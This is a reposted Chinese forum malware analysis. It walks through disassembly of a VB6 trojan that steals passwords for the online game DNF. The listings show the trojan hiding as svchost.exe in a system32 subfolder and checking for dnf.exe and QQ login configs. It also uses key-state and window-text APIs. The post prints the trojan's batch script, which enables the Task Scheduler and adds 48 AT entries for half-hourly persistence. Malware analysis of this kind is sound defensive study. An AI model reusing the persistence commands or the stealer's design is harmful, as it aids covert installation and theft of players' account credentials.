[VB] 【轉貼】線上遊戲DNF盜帳密木馬-分析源碼

SheepKingCN ( Lv.80 論壇達人 ) 發表於 2013-8-31 15:12:30 | 只看該作者 回覆獎勵 |降序瀏覽 |閱讀模式
此為本人學習、無聊研究用,為了要備份文章,所以才發在這裡。

作者: 中國大陸-当红小生
  1. 7339EDA9 . 50 push eax ; /pVersionInformation
  2. 7339EDAA . 33FF xor edi,edi ; |
  3. 7339EDAC . C785 54FFFFFF>mov dword ptr ss:[ebp-AC],94 ; |
  4. 7339EDB6 . FF15 CC103973 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
  5. 7339EDBC . 33C0 xor eax,eax
  6. ......
  7. 7339EE1F . 8D85 68FFFFFF lea eax,dword ptr ss:[ebp-98]
  8. 7339EE25 . 68 589F3A73 push msvbvm60.733A9F58 ; Service pack
  9. 7339EE2A . 50 push eax

  10. 00406882 FF50 04 call dword ptr ds:[eax+4] ; msvbvm60.Zombie_AddRef
  11. 00406885 C745 FC 0100000>mov dword ptr ss:[ebp-4],1
  12. 0040688C C745 FC 0200000>mov dword ptr ss:[ebp-4],2
  13. 00406893 E8 48960000 call 脱壳后.0040FEE0 ; F7进去是获取目录
  14. 00406898 C745 FC 0300000>mov dword ptr ss:[ebp-4],3
  15. 0040689F 6A FF push -1 ; /OnErrEvent = Resume Next
  16. 004068A1 FF15 78F04100 call dword ptr ds:[<&msvbvm60.__vbaOnErr>; msvbvm60.__vbaOnError
  17. 004068A7 C745 FC 0400000>mov dword ptr ss:[ebp-4],4
  18. 004068AE 8B15 48504100 mov edx,dword ptr ds:[415048] ; (UNICODE "C:\WINDOWS\system32")
  19. 004068B4 52 push edx
  20. 004068B5 68 88324000 push 脱壳后.00403288 ; \Pusmint
  21. 004068BA FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
  22. 004068C0 8BD0 mov edx,eax ; "C:\WINDOWS\system32\Pusmint")
  23. 004068C2 8D4D DC lea ecx,dword ptr ss:[ebp-24]
  24. 004068C5 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove
  25. 004068CB 50 push eax ; (UNICODE "C:\WINDOWS\system32\Pusmint")
  26. 004068CC FF15 40F14100 call dword ptr ds:[<&msvbvm60.rtcMakeDir>; F7
  27. 004068D2 8D4D DC lea ecx,dword ptr ss:[ebp-24] ; 创建目录
  28. 004068D5 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFreeS>; msvbvm60.__vbaFreeStr
  29. 004068DB C745 FC 0500000>mov dword ptr ss:[ebp-4],5
  30. 004068E2 A1 48504100 mov eax,dword ptr ds:[415048]
  31. 004068E7 50 push eax
  32. 004068E8 68 B4324000 push 脱壳后.004032B4 ; \Pusmint\svchost.exe
  33. 004068ED FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; msvbvm60.__vbaStrCat
  34. 004068F3 8BD0 mov edx,eax
  35. 004068F5 8D4D DC lea ecx,dword ptr ss:[ebp-24]
  36. 004068F8 FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__vbaStrMo>; msvbvm60.__vbaStrMove

  37. 00406B9E FF15 70F14100 call dword ptr ds:[<&msvbvm60.rtcDir>] ; msvbvm60.rtcDir
  38. 00406BA4 8BD0 mov edx,eax ; (UNICODE "svchost.exe")
  39. 00406BA6 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
  40. 00406BA9 FFD7 call edi ; (msvbvm60.__vbaStrMove)
  41. 00406BAB 50 push eax
  42. 00406BAC 68 3C334000 push 脱壳后.0040333C
  43. 00406BB1 FF15 BCF04100 call dword ptr ds:[<&msvbvm60.__vbaStr>; msvbvm60.__vbaStrCmp
  44. 00406BB7 8BF0 mov esi,eax
  45. 00406BB9 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
  46. 00406BBC F7DE neg esi
  47. 00406BBE 1BF6 sbb esi,esi
  48. 00406BC0 46 inc esi
  49. 00406BC1 F7DE neg esi
  50. 00406BC3 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeStr

  51. 733BD096 . 51 push ecx ; /pLocalFileTime
  52. 733BD097 . 50 push eax ; |pFileTime
  53. 733BD098 . FF15 F0103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToLocalFileTime
  54. 733BD09E . 85C0 test eax,eax
  55. 733BD0A0 . 0F84 09B10100 je msvbvm60.733D81AF
  56. 733BD0A6 . 8D5424 08 lea edx,dword ptr ss:[esp+8]
  57. 733BD0AA . 8D4424 00 lea eax,dword ptr ss:[esp]
  58. 733BD0AE . 52 push edx ; /pSystemTime
  59. 733BD0AF . 50 push eax ; |pFileTime
  60. 733BD0B0 . FF15 F4103973 call dword ptr ds:[<&KERNEL32.FileTime>; \FileTimeToSystemTime

  61. 0041005C 8B35 A0F14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaStrCopy
  62. 00410062 33FF xor edi,edi
  63. 00410064 8D4D D4 lea ecx,dword ptr ss:[ebp-2C]
  64. 00410067 897D EC mov dword ptr ss:[ebp-14],edi
  65. 0041006A 897D DC mov dword ptr ss:[ebp-24],edi
  66. 0041006D 897D D8 mov dword ptr ss:[ebp-28],edi
  67. 00410070 897D D4 mov dword ptr ss:[ebp-2C],edi
  68. 00410073 FFD6 call esi ; <&msvbvm60.__vbaStrCopy>
  69. 00410075 8B55 10 mov edx,dword ptr ss:[ebp+10]
  70. 00410078 8D4D EC lea ecx,dword ptr ss:[ebp-14]
  71. 0041007B FFD6 call esi ; (msvbvm60.__vbaStrCopy)
  72. 0041007D 8B45 D4 mov eax,dword ptr ss:[ebp-2C] ; "C:\Documents and Settings\Administrator\")
  73. 00410080 8B35 7CF14100 mov esi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileOpen
  74. 00410086 50 push eax
  75. 00410087 6A 01 push 1
  76. 00410089 6A FF push -1
  77. 0041008B 68 20010000 push 120
  78. 00410090 FFD6 call esi ; <&msvbvm60.__vbaFileOpen>
  79. 00410092 57 push edi
  80. 00410093 6A 01 push 1
  81. 00410095 FF15 88F14100 call dword ptr ds:[<&msvbvm60.rtcFileL>; msvbvm60.rtcFileLength
  82. 0041009B 8B3D F8F04100 mov edi,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaRedim
  83. 004100A1 50 push eax
  84. 004100A2 6A 01 push 1
  85. 004100A4 8D4D D8 lea ecx,dword ptr ss:[ebp-28]
  86. 004100A7 6A 11 push 11
  87. 004100A9 51 push ecx
  88. 004100AA 6A 01 push 1
  89. 004100AC 68 80000000 push 80
  90. 004100B1 FFD7 call edi ; (msvbvm60.__vbaRedim)
  91. 004100B3 83C4 1C add esp,1C
  92. 004100B6 8D55 D8 lea edx,dword ptr ss:[ebp-28]
  93. 004100B9 6A 01 push 1
  94. 004100BB 52 push edx
  95. 004100BC 68 244A4000 push 脱壳后.00404A24
  96. 004100C1 FF15 50F14100 call dword ptr ds:[<&msvbvm60.__vbaGet>; msvbvm60.__vbaGetOwner3
  97. 004100C7 8B1D A4F04100 mov ebx,dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFileClose
  98. 004100CD 6A 01 push 1
  99. 004100CF FFD3 call ebx ; <&msvbvm60.__vbaFileClose>
  100. 004100D1 8B45 EC mov eax,dword ptr ss:[ebp-14]
  101. 004100D4 50 push eax
  102. 004100D5 6A 02 push 2
  103. 004100D7 6A FF push -1
  104. 004100D9 6A 20 push 20 ; 看函数名就知道有动作了。。。
  105. 004100DB FFD6 call esi ; (msvbvm60.__vbaFileOpen)

  106. 00407281 C745 FC 0900000>mov dword ptr ss:[ebp-4],9
  107. 00407288 6A FF push -1
  108. 0040728A FF15 78F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaOnError
  109. 00407290 C745 FC 0A00000>mov dword ptr ss:[ebp-4],0A
  110. 00407297 8B0D 48504100 mov ecx,dword ptr ds:[415048]
  111. 0040729D 51 push ecx
  112. 0040729E 68 F8364000 push 脱壳后.004036F8 ; \Pusmint\SystemDir.bat 东西还真不少
  113. 004072A3 FF15 48F04100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrCat
  114. 004072A9 8BD0 mov edx,eax
  115. 004072AB 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
  116. 004072AE FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaStrMove
  117. 004072B4 50 push eax
  118. 004072B5 6A 01 push 1
  119. 004072B7 6A FF push -1
  120. 004072B9 6A 02 push 2
  121. 004072BB FF15 7CF14100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFileOpen
  122. 004072C1 8D4D C0 lea ecx,dword ptr ss:[ebp-40]
  123. 004072C4 FF15 18F24100 call dword ptr ds:[<&msvbvm60.__>; msvbvm60.__vbaFreeStr
  124. {
  125. sc config Schedule start= AUTO
  126. net start schedule
  127. AT 0:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  128. AT 1:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  129. AT 2:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  130. AT 3:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  131. AT 4:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  132. AT 5:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  133. AT 6:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  134. AT 7:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  135. AT 8:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  136. AT 9:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  137. AT 10:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  138. AT 11:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  139. AT 12:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  140. AT 13:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  141. AT 14:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  142. AT 15:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  143. AT 16:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  144. AT 17:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  145. AT 18:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  146. AT 19:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  147. AT 20:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  148. AT 21:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  149. AT 22:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  150. AT 23:00 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  151. AT 0:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  152. AT 1:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  153. AT 2:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  154. AT 3:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  155. AT 4:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  156. AT 5:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  157. AT 6:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  158. AT 7:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  159. AT 8:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  160. AT 9:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  161. AT 10:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  162. AT 11:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  163. AT 12:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  164. AT 13:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  165. AT 14:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  166. AT 15:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  167. AT 16:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  168. AT 17:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  169. AT 18:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  170. AT 19:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  171. AT 20:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  172. AT 21:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  173. AT 22:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  174. AT 23:30 /interactive /every:M,T,W,Th,F,S,Su C:\WINDOWS\system32\Pusmint\svchost.exe
  175. }
我是分隔線

  1. 00402F43 00 db 00
  2. 00402F44 $ A1 FC564100 mov eax,dword ptr ds:[4156FC]
  3. 00402F49 . 0BC0 or eax,eax
  4. 00402F4B . 74 02 je short svchost.00402F4F
  5. 00402F4D . FFE0 jmp eax
  6. 00402F4F > 68 2C2F4000 push svchost.00402F2C ; FindWindowA
  7. 00402F54 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  8. 00402F59 . FFD0 call eax
  9. 00402F5B . FFE0 jmp eax ; user32.FindWindowA
  10. 00402F5D 00 db 00
  11. 00402F5E 00 db 00

  12. 00403034   $  A1 20574100   mov eax,dword ptr ds:[415720]
  13. 00403039   .  0BC0          or eax,eax
  14. 0040303B   .  74 02         je short svchost.0040303F
  15. 0040303D   .  FFE0          jmp eax
  16. 0040303F   >  68 1C304000   push svchost.0040301C                    ;  user32
  17. 00403044   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  18. 00403049   .  FFD0          call eax
  19. 0040304B   .  FFE0          jmp eax                                  ;  SendMessageA

  20. 0040307C   $  A1 2C574100   mov eax,dword ptr ds:[41572C]
  21. 00403081   .  0BC0          or eax,eax
  22. 00403083   .  74 02         je short svchost.00403087
  23. 00403085   .  FFE0          jmp eax
  24. 00403087   >  68 64304000   push svchost.00403064                    ;  
  25. 0040308C   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  26. 00403091   .  FFD0          call eax
  27. 00403093   .  FFE0          jmp eax                                  ;  RtlMoveMemory

  28. 00403114   $  A1 44574100   mov eax,dword ptr ds:[415744]
  29. 00403119   .  0BC0          or eax,eax
  30. 0040311B   .  74 02         je short svchost.0040311F
  31. 0040311D   .  FFE0          jmp eax
  32. 0040311F   >  68 FC304000   push svchost.004030FC               ;  
  33. 00403124   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionC>
  34. 00403129   .  FFD0          call eax
  35. 0040312B   .  FFE0          jmp eax                             ;  GetForegroundWindow

  36. 0040315C   $  A1 50574100   mov eax,dword ptr ds:[415750]
  37. 00403161   .  0BC0          or eax,eax
  38. 00403163   .  74 02         je short svchost.00403167
  39. 00403165   .  FFE0          jmp eax
  40. 00403167   >  68 44314000   push svchost.00403144               ;  user32
  41. 0040316C   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionC>
  42. 00403171   .  FFD0          call eax
  43. 00403173   .  FFE0          jmp eax                             ;  GetWindowTextA


  44. 0040501F   > \68 FC4F4000   push svchost.00404FFC                    ;  GetClassNameA
  45. 00405024   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  46. 00405029   .  FFD0          call eax
  47. 0040502B   .  FFE0          jmp eax                                  ;  GetClassNameA


  48. 0040349C $ A1 A4574100 mov eax,dword ptr ds:[4157A4]
  49. 004034A1 . 0BC0 or eax,eax
  50. 004034A3 . 74 02 je short svchost.004034A7
  51. 004034A5 . FFE0 jmp eax
  52. 004034A7 > 68 84344000 push svchost.00403484 ; RegisterWindowMessageA
  53. 004034AC . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  54. 004034B1 . FFD0 call eax
  55. 004034B3 . FFE0 jmp eax

  56. 0040344C $ A1 98574100 mov eax,dword ptr ds:[415798]
  57. 00403451 . 0BC0 or eax,eax
  58. 00403453 . 74 02 je short svchost.00403457
  59. 00403455 . FFE0 jmp eax
  60. 00403457 > 68 34344000 push svchost.00403434 ; RegisterShellHookWindow
  61. 0040345C . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
  62. 00403461 . FFD0 call eax
  63. 00403463 . FFE0 jmp eax

  64. 00403543 > \68 20354000 push svchost.00403520 ; SetWindowLongA
  65. 00403548 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
  66. 0040354D . FFD0 call eax
  67. 0040354F .- FFE0 jmp eax ; user32.SetWindowLongA

  68. 00402EA4 $ A1 F0564100 mov eax,dword ptr ds:[4156F0]
  69. 00402EA9 . 0BC0 or eax,eax
  70. 00402EAB . 74 02 je short svchost.00402EAF
  71. 00402EAD . FFE0 jmp eax
  72. 00402EAF > 68 8C2E4000 push svchost.00402E8C ; GetWindowThreadProcessId

  73. 00402EB4 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
  74. 00402EB9 . FFD0 call eax
  75. 00402EBB .- FFE0 jmp eax ; user32.GetWindowThreadProcessId

  76. 00411639 . 6A 03 push 3 ; /varType = Long
  77. 0041163B . 8D45 C8 lea eax,dword ptr ss:[ebp-38] ; |
  78. 0041163E . 33FF xor edi,edi ; |
  79. 00411640 . 68 005B4000 push svchost.00405B00 ; |ArraySturctdes = svchost.00405B00
  80. 00411645 . 50 push eax ; |ArrayVar
  81. 00411646 . 897D E0 mov dword ptr ss:[ebp-20],edi ; |
  82. 00411649 . 897D BC mov dword ptr ss:[ebp-44],edi ; |
  83. 0041164C . 897D B8 mov dword ptr ss:[ebp-48],edi ; |
  84. 0041164F . 897D A8 mov dword ptr ss:[ebp-58],edi ; |
  85. 00411652 . 897D A4 mov dword ptr ss:[ebp-5C],edi ; |
  86. 00411655 . FF15 CCF04100 call dword ptr ds:[<&msvbvm60.__v>; \__vbaAryConstruct2
  87. 0041165B . 8B4D 08 mov ecx,dword ptr ss:[ebp+8]
  88. 0041165E . 51 push ecx
  89. 0041165F . 57 push edi
  90. 00411660 . 68 10040000 push 410
  91. 00411665 . E8 361BFFFF call svchost.004031A0 ; 打开进程
  92. {
  93. 004031A0 $ A1 5C574100 mov eax,dword ptr ds:[41575C]
  94. 004031A5 . 0BC0 or eax,eax
  95. 004031A7 . 74 02 je short svchost.004031AB
  96. 004031A9 . FFE0 jmp eax
  97. 004031AB > 68 88314000 push svchost.00403188 ; OpenProcess
  98. 004031B0 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctio>
  99. 004031B5 . FFD0 call eax
  100. 004031B7 .- FFE0 jmp eax ; kernel32.OpenProcess
  101. }
  102. 0041166A . 8B35 50F04100 mov esi,dword ptr ds:[<&msvbvm60.>; msvbvm60.__vbaSetSystemError
  103. 00411670 . 8945 A4 mov dword ptr ss:[ebp-5C],eax
  104. 00411673 . FFD6 call esi ; <&msvbvm60.__vbaSetSystemError>

  105. 004116A8 . FF15 A8F04100 call dword ptr ds:[<&msvbvm60.rtc>; msvbvm60.rtcSpaceVar
  106. 004116AE . 8D45 A8 lea eax,dword ptr ss:[ebp-58]
  107. 004116B1 . 50 push eax
  108. 004116B2 . FF15 18F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrVarMove
  109. 004116B8 . 8BD0 mov edx,eax
  110. 004116BA . 8D4D BC lea ecx,dword ptr ss:[ebp-44]
  111. 004116BD . FF15 F4F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrMove
  112. 004116C3 . 8D4D A8 lea ecx,dword ptr ss:[ebp-58]
  113. 004116C6 . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeVar
  114. 004116CC . 8B4D BC mov ecx,dword ptr ss:[ebp-44]
  115. 004116CF . 68 F4010000 push 1F4
  116. 004116D4 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
  117. 004116D7 . 51 push ecx
  118. 004116D8 . 52 push edx
  119. 004116D9 . FF15 D8F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToAnsi


  120. 00404B28 $ A1 F8574100 mov eax,dword ptr ds:[4157F8]
  121. 00404B2D . 0BC0 or eax,eax
  122. 00404B2F . 74 02 je short svchost.00404B33
  123. 00404B31 . FFE0 jmp eax
  124. 00404B7F   > \68 5C4B4000   push svchost.00404B5C                    ;  EnumProcessModules
  125. 00404B84   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  126. 00404B89   .  FFD0          call eax
  127. 00404B8B   .  FFE0          jmp eax                                  ;  EnumProcessModules


  128. 004116F9 . FF15 20F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrToUnicode
  129. 004116FF . 8D4D B8 lea ecx,dword ptr ss:[ebp-48]
  130. 00411702 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaFreeStr
  131. 00411708 . 8B55 BC mov edx,dword ptr ss:[ebp-44]
  132. 0041170B . 8D4D E0 lea ecx,dword ptr ss:[ebp-20]
  133. 0041170E . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__v>; msvbvm60.__vbaStrCopy

  134. 00403230 $ A1 74574100 mov eax,dword ptr ds:[415774]
  135. 00403235 . 0BC0 or eax,eax
  136. 00403237 . 74 02 je short svchost.0040323B
  137. 00403239 . FFE0 jmp eax
  138. 0040323B > 68 18324000 push svchost.00403218 ; CloseHandle
  139. 00403240 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunction>
  140. 00403245 . FFD0 call eax
  141. 00403247 . FFE0 jmp eax

  142. 0040C2BC . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
  143. 0040C2C2 . 6A 00 push 0
  144. 0040C2C4 . 6A FF push -1
  145. 0040C2C6 . 6A 01 push 1
  146. 0040C2C8 . 68 BC4B4000 push svchost.00404BBC ; UserSetting.ini
  147. 0040C2CD . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
  148. 0040C2D2 . 8D45 B8 lea eax,dword ptr ss:[ebp-48]
  149. 0040C2D5 . 50 push eax ; /String8
  150. 0040C2D6 . 8D4D D0 lea ecx,dword ptr ss:[ebp-30] ; |
  151. 0040C2D9 . 51 push ecx ; |ARG2 = 0012FB48
  152. 0040C2DA . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal

  153. 0040C322 . FF15 B8F04100 call dword ptr ds:[<&msvbvm60.rt>; msvbvm60.rtcUpperCaseVar
  154. 0040C328 . 6A 00 push 0
  155. 0040C32A . 6A FF push -1
  156. 0040C32C . 6A 01 push 1
  157. 0040C32E . 68 E04B4000 push svchost.00404BE0 ; config\Info.ini
  158. 0040C333 . 68 A04B4000 push svchost.00404BA0 ; QQLOGIN.EXE
  159. 0040C338 . 8D55 B8 lea edx,dword ptr ss:[ebp-48]
  160. 0040C33B . 52 push edx ; /String8
  161. 0040C33C . 8D45 D0 lea eax,dword ptr ss:[ebp-30] ; |
  162. 0040C33F . 50 push eax ; |ARG2
  163. 0040C340 . FF15 54F14100 call dword ptr ds:[<&msvbvm60.__>; \__vbaStrVarVal


  164. 0040C673 . BA 044C4000 mov edx,svchost.00404C04 ; dnf.exe
  165. 0040C678 . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
  166. 0040C67B . FF15 A0F14100 call dword ptr ds:[<&msvbvm60.__vbaStrCo>; msvbvm60.__vbaStrCopy
  167. 0040C681 . 8D55 CC lea edx,dword ptr ss:[ebp-34]

  168. 00404C6F > \68 4C4C4000 push svchost.00404C4C ; CreateToolhelp32Snapshot
  169. 00404C74 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionCal>
  170. 00404C79 . FFD0 call eax
  171. 00404C7B .- FFE0 jmp eax ; kernel32.CreateToolhelp32Snapshot

  172. 00404CD3 > \68 B04C4000 push svchost.00404CB0 ; Process32First
  173. 00404CD8 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  174. 00404CDD . FFD0 call eax
  175. 00404CDF . FFE0 jmp eax ; Process32First

  176. 00404D1B > \68 F84C4000 push svchost.00404CF8 ; Process32Next
  177. 00404D20 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  178. 00404D25 . FFD0 call eax
  179. 00404D27 .- FFE0 jmp eax ; kernel32.Process32Next

  180. 0040C685 . E8 064C0000 call svchost.00411290 ; 创建快照
  181. 0040C68A . 8945 D8 mov dword ptr ss:[ebp-28],eax
  182. 0040C68D . 8D4D CC lea ecx,dword ptr ss:[ebp-34]
  183. 0040C690 . FF15 18F24100 call dword ptr ds:[<&msvbvm60.__vba>; msvbvm60.__vbaFreeStr
  184. 0040C696 . C745 FC 03000>mov dword ptr ss:[ebp-4],3
  185. 0040C69D . 837D D8 00 cmp dword ptr ss:[ebp-28],0
  186. 0040C6A1 . 0F84 62240000 je svchost.0040EB09 这个是判断是否有DNF.exe
  187. 0040C6A7 . C745 FC 04000>mov dword ptr ss:[ebp-4],4


  188. 004034FB > \68 D8344000 push svchost.004034D8 ; DeregisterShellHookWindow
  189. 00403500 . B8 201B4000 mov eax,<jmp.&msvbvm60.DllFunctionC>
  190. 00403505 . FFD0 call eax
  191. 00403507 . FFE0 jmp eax


  192. 733A03F6    BB B8A63A73     mov ebx,msvbvm60.733AA6B8             ; ThunderRT6Main   
  193. 733A03FB    50              push eax
  194. 733A03FC    53              push ebx
  195. 733A03FD    FF35 D0064A73   push dword ptr ds:[734A06D0]          ; msvbvm60.73390000
  196. 733A0403    FF15 F8123973   call dword ptr ds:[<&USER32.GetClassI>; user32.GetClassInfoExA
  197. 733A0409    33F6            xor esi,esi
  198. 733A040B    85C0            test eax,eax
  199. 733A040D    75 71           jnz short msvbvm60.733A0480
  200. 733A040F    6A 0C           push 0C
  201. 733A0411    8D7D CC         lea edi,dword ptr ss:[ebp-34]
  202. 733A0414    59              pop ecx
  203. 733A0415    6A 01           push 1
  204. 733A0417    FF35 D4064A73   push dword ptr ds:[734A06D4]          ; svchost.00400000

  205. 733A130E . BF 10A93A73 mov edi,msvbvm60.733AA910 ; ASCII "VBMsoStdCompMgr"
  206. 733A1313 . 68 55133A73 push msvbvm60.733A1355
  207. 733A1318 . 57 push edi
  208. 733A1319 . E8 7DDEFFFF call msvbvm60.7339F19B

  209. 004035D0   $  A1 D4574100   mov eax,dword ptr ds:[4157D4]
  210. 004035D5   .  0BC0          or eax,eax
  211. 004035D7   .  74 02         je short svchost.004035DB
  212. 004035D9   .  FFE0          jmp eax
  213. 004035DB   >  68 B8354000   push svchost.004035B8                    ;  user32
  214. 004035E0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  215. 004035E5   .  FFD0          call eax
  216. 004035E7   .  FFE0          jmp eax                                  ;  GetWindowTextLengthW

  217. 0040364D   .  0BC0          or eax,eax
  218. 0040364F   .  74 02         je short svchost.00403653
  219. 00403651   .  FFE0          jmp eax
  220. 00403653   >  68 30364000   push svchost.00403630                    ;  user32
  221. 00403658   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  222. 0040365D   .  FFD0          call eax
  223. 0040365F   .  FFE0          jmp eax                                  ;  GetKeyState

  224. 00403690   $  A1 EC574100   mov eax,dword ptr ds:[4157EC]
  225. 00403695   .  0BC0          or eax,eax
  226. 00403697   .  74 02         je short svchost.0040369B
  227. 00403699   .  FFE0          jmp eax
  228. 0040369B   >  68 78364000   push svchost.00403678                    ;  user32
  229. 004036A0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  230. 004036A5   .  FFD0          call eax
  231. 004036A7   .  FFE0          jmp eax                                  ;  MapVirtualKeyA

  232. 7340CEF2 |. 56 push esi ; /lParam
